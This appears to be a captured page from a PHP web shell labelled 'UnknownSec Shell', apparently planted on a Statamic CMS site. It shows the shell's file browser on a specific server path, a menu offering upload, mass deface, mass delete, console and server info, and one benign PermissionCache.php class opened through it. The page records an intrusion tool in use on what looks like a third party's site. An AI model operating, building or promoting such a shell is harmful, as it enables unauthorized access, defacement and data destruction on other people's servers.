shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
lolasweb.brannanatkinson.com
/
vendor
/
statamic
/
cms
/
src
/
Auth
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
PermissionCache.php
<?php namespace Statamic\Auth; class PermissionCache { protected $items = []; public function get(string $user) { return $this->items[$user] ?? null; } public function put(string $user, $permissions) { $this->items[$user] = $permissions; } public function clear() { $this->items = []; } }
© 2026 UnknownSec